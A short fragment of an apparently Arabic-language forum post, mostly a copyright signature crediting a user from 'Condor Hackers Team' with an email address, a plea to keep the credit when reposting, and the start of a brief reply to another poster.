//////CoPy RiGhTs\\\\\\
ll ©opy ®ights ®efers@
PrO-†H!3F
SUFYAN_14@HOTMAIL.COM
MEMBER IN CONDOR HACKERS TEAM
للي يريد ينقل الموضوع لا ينقص حاجة وبذات هذي الفقرةانا عارف
انك تبي تحذف هالجزء وبعدين تحدد الموضوع وتعمل كت وبست وتنقله
لمنتدى ثاني وتكتب اخر الموضوع اسمك لكن ما نقووول الا الله يعينك
//////CoPy RiGhTs\\\\\\
الظاهر اننا نكتب في نفس الوقت على العموم الجواب الله يسلمك
: 
: 
: